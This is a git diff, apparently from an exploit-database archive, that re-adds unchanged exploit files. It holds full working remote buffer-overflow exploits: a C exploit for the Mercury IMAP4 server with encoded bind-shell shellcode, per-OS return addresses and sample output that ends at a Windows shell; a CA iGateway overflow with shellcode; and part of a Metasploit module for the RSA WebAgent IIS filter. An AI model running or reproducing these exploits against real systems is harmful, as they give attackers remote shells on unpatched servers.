-      printf("[-] ouch! Server is not listening .... \n");
- }
-  shutdown(sock,1);
-  closesocket(sock);
-  }
-   void gotshell(int new_sock)  
-	{
-  struct timeval tv;
-  int length;
-  unsigned long o[2];
-  char bufferx[1000];
-
-  tv.tv_sec = 1;
-  tv.tv_usec = 0;
-
-  while (1) {
-	
-	o[0] = 1;
-	o[1] = new_sock; 
-
-	length = select (0, (fd_set *)&o, NULL, NULL, &tv);
-	if(length == 1)
-		{
-	length = recv (new_sock, bufferx, sizeof (bufferx), 0);
-	if (length <= 0) 
-		{
-	printf ("[-] Connection closed.\n");
-	WSACleanup();
-	return;
-		}
-	length = write (1, bufferx, length);
-	if (length <= 0) 
-		{
-	printf("[-] Connection closed.\n");
-	WSACleanup();
-	return;
-		}
-		}
-	else
-	{
-	length = read (0, bufferx, sizeof (bufferx));
-	if (length <= 0) 
-		{
-	printf("[-] Connection closed.\n");
-	WSACleanup();
-	return;
-		}
-	length = send(new_sock, bufferx, length, 0);
-	if (length <= 0) 
-	{
-	printf("[-] Connection closed.\n");
-	WSACleanup();
-	return;
-				}
-			}
-		}
-   }
-
-// milw0rm.com [2005-09-20]
+/*   
+     Mercury imap4 server remote buffer overflow exploit
+     author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
+     package : Mercury mail transport system 4.01a and prolly prior
+     workaround : upgrade to 4.01b version
+     advisory : not available right now 
+     company address : www.pmail.com
+     timeline :
+     15 Sep 2005 : vulnerability reported by securiteam mailing list
+     20 Sep 2005 : IHS exploit released 
+     exploit features :
+     1) 5 working targets including win2k , winxp , win2k3
+     2) reliable metasploit shellcode
+     3) autoconnect to shell
+     bad chars are : 0x20 0x0a 
+     compiled with visual c++ 6 : cl mercury_imap.c 
+     greeting to :
+     www.ihsteam.com       the team , LorD and NT heya
+     www.ihsteam.net       english version ,
+     www.exploitdev.com    Jamie and Ben the two good brothers also my brothers
+     www.metasploit.com    when are you gonna release the newer version :P ?
+     www.class101.org      class with his new laptop :>
+     www.milw0rm.com       str0ke , I am sending it to you first dont doubt :d 
+     www.c0d3r.org         study time started :((( , pitty for the c0d3r !
+     shout to actionspider 
+     read these lines and try to understand ( I know you cant akhey ) that 
+     an script kiddie (defacer) never ever could be compared to an exploit coder
+     try to grow , being grown up is not related to age  -- with respects 
+/*
+/*
+
+D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc
+
+-------- mercury imap remote BOF exploit by c0d3r
+
+[+] target : windows 2003 server enterprise service pack 1
+[+] building login data
+[+] building overflow string
+[+] attacking host ihs
+[+] packet size = 625 byte
+[+] connected
+[+] sending login info
+[+] sending exploit string
+[+] exploit sent successfully to ihs
+[+] trying to get shell
+[+] connecting to ihs on port 4444
+[+] target exploited successfully
+[+] Dropping into shell
+
+Microsoft Windows [Version 5.2.3790]
+(C) Copyright 1985-2003 Microsoft Corp.
+
+H:\MERCURY>
+
+*/
+
+#include 
+#include 
+#include 
+#include 
+#pragma comment(lib, "ws2_32.lib")
+#define NOP 0x90
+#define size 625
+// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1   
+
+
+// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub
+// bad chars : 0x00 0x0a 0x20 0x0d
+
+char shellcode[]=
+"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92"
+"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4"
+"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0"
+"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2"
+"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13"
+"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0"
+"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0"
+"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b"
+"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb"
+"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39"
+"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68"
+"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda"
+"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53"
+"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72"
+"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c"
+"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b"
+"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16"
+"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4"
+"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a"
+"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb"
+"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64"
+"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b";
+
+
+  void gotshell (int newsock);
+  unsigned int rc,sock,os,addr,rc2 ;
+  struct sockaddr_in tcp;
+  struct hostent *hp;
+  WSADATA wsaData;
+  char buffer[size];
+  char point_esp[5];
+  unsigned short port;
+  char req1[] =  "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E";
+  char req2[] =  "\x30\x30\x30\x31";
+  unsigned char *login,*exploit;
+  char vuln_command[] = "\x4C\x49\x53\x54";
+  char winxpsp1[]   = "\xCC\x59\xFB\x77"; // jmp esp in ntdll
+  char winxpsp2[]   = "\xED\x1E\x94\x7C"; // jmp esp (not tested)
+  char win2ksp4[]   = "\x23\xde\xaf\x01"; // call esp in kernel32.dll
+  char win2k3_sp0[] = "\xAB\x8B\xFB\x77"; // jmp esp in ntdll
+  char win2k3_sp1[] = "\x6A\xFA\xE8\x77"; // push esp - ret in kernel32
+                    
+ int main (int argc, char *argv[]){
+  
+	
+ if(argc < 6) {
+ printf("\n-------- mercury imap remote BOF exploit by c0d3r\n");
+ printf("-------- usage : imap.exe host port target username password\n");
+ printf("-------- target 1 : windows xp service pack 1         : 0\n");
+ printf("-------- target 2 : windows xp service pack 2         : 1\n");
+ printf("-------- target 3 : windoes 2k advanced server sp 4   : 2\n");
+ printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
+ printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
+ printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n");	
+ exit(-1) ;
+  } 
+  printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n");
+ os = (unsigned short)atoi(argv[3]); 	 
+  switch(os)
+  {
+   case 0:
+    strcat(point_esp,winxpsp1);
+    printf("[+] target : windows xp service pack 1\n");
+	break;
+   case 1:
+    strcat(point_esp,winxpsp2); 
+    printf("[+] target : windows xp service pack 2\n");
+	break;
+   case 2:
+    strcat(point_esp,win2ksp4); 
+    printf("[+] target : windows 2000 advanced server service pack 4\n");
+	break;
+   case 3:
+	strcat(point_esp,win2k3_sp0);
+	printf("[+] target : windows 2003 server enterprise service pack 0\n");
+	break;
+   case 4:
+	strcat(point_esp,win2k3_sp1);
+	printf("[+] target : windows 2003 server enterprise service pack 1\n");
+	break;
+   default:
+    printf("\n[-] this target doesnt exist in the list\n\n");
+   
+    exit(-1);
+  }  
+	
+  printf("[+] building login data\n");
+  login = malloc(256);
+  memset(login,0,256);
+  sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]);
+
+    // Creating heart of exploit code 4 5
+  
+    printf("[+] building overflow string");
+  
+    memset(buffer,NOP,size);
+    memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
+    memcpy(buffer+280,shellcode,sizeof(shellcode)-1);
+    buffer[size] = 0;
+    exploit = malloc(1000);
+    memset(exploit,0,1000);
+    sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer);
+	
+   // EO heart of exploit code 
+
+  
+			if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
+   printf("[-] WSAStartup failed !\n");
+   exit(-1);
+  }
+	hp = gethostbyname(argv[1]);
+  Sleep(1500);
+  if (!hp){
+   addr = inet_addr(argv[1]);
+  }
+  if ((!hp)  && (addr == INADDR_NONE) ){
+   printf("[-] unable to resolve %s\n",argv[1]);
+   exit(-1);
+  }
+  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  if (!sock){ 
+   printf("[-] socket() error...\n");
+   exit(-1);
+  }
+	  if (hp != NULL)
+   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
+  else
+   tcp.sin_addr.s_addr = addr;
+
+  if (hp)
+   tcp.sin_family = hp->h_addrtype;
+  else
+  tcp.sin_family = AF_INET;
+  port=atoi(argv[2]);
+  tcp.sin_port=htons(port);
+   
+  
+  printf("\n[+] attacking host %s\n" , argv[1]) ;
+  
+  Sleep(1000);
+  
+  printf("[+] packet size = %d byte\n" , sizeof(buffer));
+  
+  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
+  if(rc==0)
+  {
+    
+     Sleep(1500) ;
+     printf("[+] connected\n") ;
+     printf("[+] sending login info\n") ;
+     send(sock,login,strlen(login),0);
+     Sleep(1500);
+     printf("[+] sending exploit string\n") ;
+     send(sock,exploit,strlen(exploit),0);
+     Sleep(1500);
+     printf("[+] exploit sent successfully to %s \n" , argv[1]);
+     printf("[+] trying to get shell\n");
+     printf("[+] connecting to %s on port 4444\n",argv[1]);
+     sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+     Sleep(1500);
+     if (!sock){ 
+     printf("[-] socket() error...\n");
+     exit(-1);
+	 }
+	 tcp.sin_family = AF_INET;
+	 tcp.sin_port=htons(4444);
+	 rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
+     if(rc2 != 0) {
+	 printf("[-] exploit probably failed\n");
+	 exit(-1);
+	 }
+     if(rc2==0)
+	 {
+	  printf("[+] target exploited successfully\n");
+      printf("[+] Dropping into shell\n\n");
+	 gotshell(sock);
+	 }
+  } 
+  
+  else {
+      printf("[-] ouch! Server is not listening .... \n");
+ }
+  shutdown(sock,1);
+  closesocket(sock);
+  }
+   void gotshell(int new_sock)  
+	{
+  struct timeval tv;
+  int length;
+  unsigned long o[2];
+  char bufferx[1000];
+
+  tv.tv_sec = 1;
+  tv.tv_usec = 0;
+
+  while (1) {
+	
+	o[0] = 1;
+	o[1] = new_sock; 
+
+	length = select (0, (fd_set *)&o, NULL, NULL, &tv);
+	if(length == 1)
+		{
+	length = recv (new_sock, bufferx, sizeof (bufferx), 0);
+	if (length <= 0) 
+		{
+	printf ("[-] Connection closed.\n");
+	WSACleanup();
+	return;
+		}
+	length = write (1, bufferx, length);
+	if (length <= 0) 
+		{
+	printf("[-] Connection closed.\n");
+	WSACleanup();
+	return;
+		}
+		}
+	else
+	{
+	length = read (0, bufferx, sizeof (bufferx));
+	if (length <= 0) 
+		{
+	printf("[-] Connection closed.\n");
+	WSACleanup();
+	return;
+		}
+	length = send(new_sock, bufferx, length, 0);
+	if (length <= 0) 
+	{
+	printf("[-] Connection closed.\n");
+	WSACleanup();
+	return;
+				}
+			}
+		}
+   }
+
+// milw0rm.com [2005-09-20]
diff --git a/platforms/windows/remote/123.c b/platforms/windows/remote/123.c
index f8e44646d..df118b0ce 100755
--- a/platforms/windows/remote/123.c
+++ b/platforms/windows/remote/123.c
@@ -482,6 +482,6 @@ int main(int argc, char *argv[]) {
 
 	return 0;
 
-}
-
-// milw0rm.com [2003-11-14]
+}
+
+// milw0rm.com [2003-11-14]
diff --git a/platforms/windows/remote/1243.c b/platforms/windows/remote/1243.c
index 5401a8e40..817019647 100755
--- a/platforms/windows/remote/1243.c
+++ b/platforms/windows/remote/1243.c
@@ -1,108 +1,108 @@
-/*ca igateway debug remote overflow -egm erikam@gmail.com*/
-/*01.30.05*/
-#include 
-#include 
-#include 
-#include 
-
-const int MAXSIZE = 17110;
-
-char sc[] = //metasploit
-"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d"
-"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79"
-"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01"
-"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d"
-"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc"
-"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35"
-"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15"
-"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf"
-"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e\x1e\xc5\x62\x4d\x92\x27\x55\xd2"
-"\x80\x0b\x06\x49\x92\x21\x62\x90\x88\x91\xbc\xf4\x65\xf5\x68\x73"
-"\x6f\x08\xed\x71\xb4\xfe\xc8\xb4\x3a\x08\xeb\x4a\x3e\xa4\x6e\x4a"
-"\x2e\xa4\x7e\x4a\x92\x27\x5b\x71\x6b\x58\x5b\x4a\xe4\x16\xa8\x71"
-"\xc9\xed\x4d\xde\x3a\x08\xeb\x73\x7d\xa6\x68\xe6\xbd\x9f\x99\xb4"
-"\x43\x1e\x6a\xe6\xbb\xa4\x68\xe6\xbd\x9f\xd8\x50\xeb\xbe\x6a\xe6"
-"\xbb\xa7\x69\x4d\x38\x08\xed\x8a\x05\x10\x44\xdf\x14\xa0\xc2\xcf"
-"\x38\x08\xed\x7f\x07\x93\x5b\x71\x0e\x9a\xb4\xfc\x07\xa7\x64\x30"
-"\xa1\x7e\xda\x73\x29\x7e\xdf\x28\xad\x04\x97\xe7\x2f\xda\xc3\x5b"
-"\x41\x64\xb0\x63\x55\x5c\x96\xb2\x05\x85\xc3\xaa\x7b\x08\x48\x5d"
-"\x92\x21\x66\x4e\x3f\xa6\x6c\x48\x07\xf6\x6c\x48\x38\xa6\xc2\xc9"
-"\x05\x5a\xe4\x1c\xa3\xa4\xc2\xcf\x07\x08\xc2\x2e\x92\x27\xb6\x4e"
-"\x91\x74\xf9\x7d\x92\x21\x6f\xe6\xbd\x9f\xcd\x93\x69\xa8\x6e\xe6"
-"\xbb\x08\xed\x19\x6d\xf7";
-
-int tcp_connect(char *host,int port) {
-
-struct hostent *hp;
-struct sockaddr_in addr;
-int sock;
-
-if (!(hp=gethostbyname(host))){
-fprintf(stderr,"Something died! \n");
-return -1;
-}
-
-memset(&addr,0,sizeof(addr));
-addr.sin_addr=*(struct in_addr*)hp->h_addr;
-addr.sin_family=AF_INET;
-addr.sin_port=htons(port);
-
-if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
-fprintf(stderr,"Dead again!\n");
-return -1;
-}
-
-if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){
-fprintf(stderr,"Dead once more! \n");
-return -1;
-}
-return sock;
-}
-
-/*Just supply a target ./caigw-win32 hostname */
-int main(int argc, char *argv[])
-{
-char buffer[MAXSIZE+1];
-int i = 0;
-int sclen = sizeof(sc), sock = 0;
-
-if(!argv[1])
-return 0;
-
-memset(buffer,'\x90',MAXSIZE/2);
-
-memcpy(buffer,"GET",3);
-
-for(i=3;i<24;i++)
-memcpy(buffer+i," ",1);
-for(i=21;i<423;i++)
-buffer[i] = 'A';
-
-/* XP SP2*/ 
-//memcpy(buffer + 423+25,"\xdd\x10\x12\x12",4);
-/*W2ksp4 */
-memcpy(buffer + 422+25,"\xdd\x10\x12\x12",4);
-
-memcpy(buffer + 460,sc,sclen - 1);
-memcpy(buffer + (460 + sclen)," HTTP/1.0\r\n\r\n\r\n",16);
-buffer[460+sclen+20] = '\0';
-
-if( (sock = tcp_connect(argv[1],5250)) != -1 )
-{
-int bytes = 0;
-
-printf("[~] Sending request... \n");
-bytes = send(sock,buffer,strlen(buffer),0);
-printf("[!] Sent [%d] bytes\n",bytes);
-}
-else 
-return -1;
-
-close(sock);
-sleep (2);
-
-printf("[@] Now telnet to port 1711\n");
-return 0;
-}
-
-// milw0rm.com [2005-10-10]
+/*ca igateway debug remote overflow -egm erikam@gmail.com*/
+/*01.30.05*/
+#include 
+#include 
+#include 
+#include 
+
+const int MAXSIZE = 17110;
+
+char sc[] = //metasploit
+"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d"
+"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79"
+"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01"
+"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d"
+"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc"
+"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35"
+"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15"
+"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf"
+"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e\x1e\xc5\x62\x4d\x92\x27\x55\xd2"
+"\x80\x0b\x06\x49\x92\x21\x62\x90\x88\x91\xbc\xf4\x65\xf5\x68\x73"
+"\x6f\x08\xed\x71\xb4\xfe\xc8\xb4\x3a\x08\xeb\x4a\x3e\xa4\x6e\x4a"
+"\x2e\xa4\x7e\x4a\x92\x27\x5b\x71\x6b\x58\x5b\x4a\xe4\x16\xa8\x71"
+"\xc9\xed\x4d\xde\x3a\x08\xeb\x73\x7d\xa6\x68\xe6\xbd\x9f\x99\xb4"
+"\x43\x1e\x6a\xe6\xbb\xa4\x68\xe6\xbd\x9f\xd8\x50\xeb\xbe\x6a\xe6"
+"\xbb\xa7\x69\x4d\x38\x08\xed\x8a\x05\x10\x44\xdf\x14\xa0\xc2\xcf"
+"\x38\x08\xed\x7f\x07\x93\x5b\x71\x0e\x9a\xb4\xfc\x07\xa7\x64\x30"
+"\xa1\x7e\xda\x73\x29\x7e\xdf\x28\xad\x04\x97\xe7\x2f\xda\xc3\x5b"
+"\x41\x64\xb0\x63\x55\x5c\x96\xb2\x05\x85\xc3\xaa\x7b\x08\x48\x5d"
+"\x92\x21\x66\x4e\x3f\xa6\x6c\x48\x07\xf6\x6c\x48\x38\xa6\xc2\xc9"
+"\x05\x5a\xe4\x1c\xa3\xa4\xc2\xcf\x07\x08\xc2\x2e\x92\x27\xb6\x4e"
+"\x91\x74\xf9\x7d\x92\x21\x6f\xe6\xbd\x9f\xcd\x93\x69\xa8\x6e\xe6"
+"\xbb\x08\xed\x19\x6d\xf7";
+
+int tcp_connect(char *host,int port) {
+
+struct hostent *hp;
+struct sockaddr_in addr;
+int sock;
+
+if (!(hp=gethostbyname(host))){
+fprintf(stderr,"Something died! \n");
+return -1;
+}
+
+memset(&addr,0,sizeof(addr));
+addr.sin_addr=*(struct in_addr*)hp->h_addr;
+addr.sin_family=AF_INET;
+addr.sin_port=htons(port);
+
+if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
+fprintf(stderr,"Dead again!\n");
+return -1;
+}
+
+if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){
+fprintf(stderr,"Dead once more! \n");
+return -1;
+}
+return sock;
+}
+
+/*Just supply a target ./caigw-win32 hostname */
+int main(int argc, char *argv[])
+{
+char buffer[MAXSIZE+1];
+int i = 0;
+int sclen = sizeof(sc), sock = 0;
+
+if(!argv[1])
+return 0;
+
+memset(buffer,'\x90',MAXSIZE/2);
+
+memcpy(buffer,"GET",3);
+
+for(i=3;i<24;i++)
+memcpy(buffer+i," ",1);
+for(i=21;i<423;i++)
+buffer[i] = 'A';
+
+/* XP SP2*/ 
+//memcpy(buffer + 423+25,"\xdd\x10\x12\x12",4);
+/*W2ksp4 */
+memcpy(buffer + 422+25,"\xdd\x10\x12\x12",4);
+
+memcpy(buffer + 460,sc,sclen - 1);
+memcpy(buffer + (460 + sclen)," HTTP/1.0\r\n\r\n\r\n",16);
+buffer[460+sclen+20] = '\0';
+
+if( (sock = tcp_connect(argv[1],5250)) != -1 )
+{
+int bytes = 0;
+
+printf("[~] Sending request... \n");
+bytes = send(sock,buffer,strlen(buffer),0);
+printf("[!] Sent [%d] bytes\n",bytes);
+}
+else 
+return -1;
+
+close(sock);
+sleep (2);
+
+printf("[@] Now telnet to port 1711\n");
+return 0;
+}
+
+// milw0rm.com [2005-10-10]
diff --git a/platforms/windows/remote/1260.pm b/platforms/windows/remote/1260.pm
index 2f1940f90..d541b4030 100755
--- a/platforms/windows/remote/1260.pm
+++ b/platforms/windows/remote/1260.pm
@@ -1,162 +1,162 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::rsa_iiswebagent_redirect;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'  => 'IIS RSA WebAgent Redirect Overflow',
-	'Version'  => '$Revision: 1.4 $',
-	'Authors' => [ 'H D Moore ', ],
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32' ],
-	'Priv'  => 0,
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 80],
-		'SSL'   => [0, 'BOOL', 'Use SSL'],
-		'URL'   => [1, 'DATA', 'The path to the DLL', '/WebID/IISWebAgentIF.dll'],
-	  },
-
-	'Payload' =>
-	  {
-		'Space'     => 1024,
-		'BadChars'  => 
-						"\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f".
-						"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x5c". "Z",
-						
-		'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",
-		'Keys'      => ['+ws2ord'],
-	  },
-
-	'Description'  => Pex::Text::Freeform(qq{
-		This module exploits a stack overflow in the SecurID Web Agent for IIS.
-	This ISAPI filter runs in-process with inetinfo.exe, any attempt to
-	exploit this flaw will result in the termination and potential restart
-	of the IIS service.
-}),
-
-	'Refs'  =>
-	  [
-	  	# Anyone got a patch/advisory/solution URL?
-	  ],
-	  
-	'Targets' =>
-	  [
-	  	# Version-specific return addresses
-		['RSA WebAgent 5.2', 996, 0x1001e694],
-		['RSA WebAgent 5.3', 992, 0x10010e89],
-		
-		# Generic return addresses
-		['RSA WebAgent 5.2 on Windows 2000 English', 996, 0x75022ac4],
-		['RSA WebAgent 5.3 on Windows 2000 English', 992, 0x75022ac4],
-		
-		['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', 996, 0x71ab1d54],
-		['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', 992, 0x71ab1d54],
-		
-		['RSA WebAgent 5.2 on Windows XP SP2 English', 996, 0x71ab9372],
-		['RSA WebAgent 5.3 on Windows XP SP2 English', 992, 0x71ab9372],
-		
-		['RSA WebAgent 5.2 on Windows 2003 English SP0', 996, 0x7ffc0638],
-		['RSA WebAgent 5.3 on Windows 2003 English SP0', 992, 0x7ffc0638],
-
-	  ],
-
-	'Keys' => ['rsa'],
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Check {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return $self->CheckCode('Connect');
-	}
-
-	$s->Send("GET ".$self->GetVar('URL')."?GetPic?image=msf HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");
-
-	my $r = $s->Recv(-1, 5);
-
-	if ($r =~ /RSA Web Access Authentication/)
-	{
-		$self->PrintLine("[*] Found IISWebAgentIF.dll ;)");
-		return $self->CheckCode('Detected');
-	} else {
-
-		$self->PrintLine("The IISWebAgentIF.dll ISAPI does not appear to be installed");
-		return $self->CheckCode('Safe');
-	}
-}
-
-sub Exploit {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target      = $self->Targets->[ $target_idx ];
-
-	$self->PrintLine("[*] Attempting to exploit target ".$target->[0]);
-
-
-	my $pattern = Pex::Text::AlphaNumText(8192);
-	# Just don't ask.
-	$pattern =~ s/\d|Z/A/ig;
-	
-	substr($pattern, $target->[1]    , 4, pack('V', $target->[2]));
-	substr($pattern, $target->[1] - 4, 2, "\xeb\x06");
-	substr($pattern, $target->[1] + 4, length($shellcode), $shellcode);
-
-	my $request =
-	  "GET ".$self->GetVar('URL')."?Redirect?url=$pattern HTTP/1.1\r\n".
-	  "Host: $target_host:$target_port\r\n\r\n";
-
-	my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
-	  );
-	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-
-	$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
-	$s->Send($request);
-
-	$self->PrintLine("[*] Waiting for a response...");
-	$s->Recv(-1, 10);
-	$self->Handler($s);
-	$s->Close();
-	return;
-}
-
-# milw0rm.com [2005-10-19]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::rsa_iiswebagent_redirect;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+	'Name'  => 'IIS RSA WebAgent Redirect Overflow',
+	'Version'  => '$Revision: 1.4 $',
+	'Authors' => [ 'H D Moore ', ],
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32' ],
+	'Priv'  => 0,
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 80],
+		'SSL'   => [0, 'BOOL', 'Use SSL'],
+		'URL'   => [1, 'DATA', 'The path to the DLL', '/WebID/IISWebAgentIF.dll'],
+	  },
+
+	'Payload' =>
+	  {
+		'Space'     => 1024,
+		'BadChars'  => 
+						"\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f".
+						"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x5c". "Z",
+						
+		'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",
+		'Keys'      => ['+ws2ord'],
+	  },
+
+	'Description'  => Pex::Text::Freeform(qq{
+		This module exploits a stack overflow in the SecurID Web Agent for IIS.
+	This ISAPI filter runs in-process with inetinfo.exe, any attempt to
+	exploit this flaw will result in the termination and potential restart
+	of the IIS service.
+}),
+
+	'Refs'  =>
+	  [
+	  	# Anyone got a patch/advisory/solution URL?
+	  ],
+	  
+	'Targets' =>
+	  [
+	  	# Version-specific return addresses
+		['RSA WebAgent 5.2', 996, 0x1001e694],
+		['RSA WebAgent 5.3', 992, 0x10010e89],
+		
+		# Generic return addresses
+		['RSA WebAgent 5.2 on Windows 2000 English', 996, 0x75022ac4],
+		['RSA WebAgent 5.3 on Windows 2000 English', 992, 0x75022ac4],
+		
+		['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', 996, 0x71ab1d54],
+		['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', 992, 0x71ab1d54],
+		
+		['RSA WebAgent 5.2 on Windows XP SP2 English', 996, 0x71ab9372],
+		['RSA WebAgent 5.3 on Windows XP SP2 English', 992, 0x71ab9372],
